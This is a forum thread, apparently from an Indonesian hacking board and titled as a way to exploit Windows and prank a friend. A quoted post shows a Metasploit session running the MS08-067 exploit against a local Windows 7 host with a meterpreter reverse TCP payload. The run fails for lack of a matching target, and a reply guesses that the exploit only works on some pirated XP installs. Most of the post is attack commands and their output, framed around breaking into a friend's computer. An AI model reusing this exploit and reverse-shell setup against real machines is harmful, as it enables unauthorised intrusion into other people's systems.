Exploit Windows ga pake Backdoor + ngerjain temen
#5
(01-31-2012, 08:26 AM)one Wrote: kok punya ane gini terus ya bro
<code>

msf exploit(ms08_067_netapi) > set LHOST 172.16.21.190
LHOST => 172.16.21.190
msf exploit(ms08_067_netapi) > set RHOST 172.16.21.141
RHOST => 172.16.21.141
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.21.190:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 Ultimate - (Build 7600) - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.

Itu berati targetnya ga pas Om
Ane coba buat exploit windows yang pake serial alsi juga ga bisa

Tapi kalo windows yang pake serial xp8bf-dst bisa dan lancar

Tapi ga tau tepatnya juga
mungkin OM momod lebih tau maklum ane pengguna baru

CMIIW
Code:
99% [=====================================> ] 325,748,506 46.2K/s eta 75s


Messages In This Thread
RE: Exploit Windows ga pake Backdoor + ngerjain temen - by kuch1k1 - 02-01-2012, 10:21 AM




Users browsing this thread: 1 Guest(s)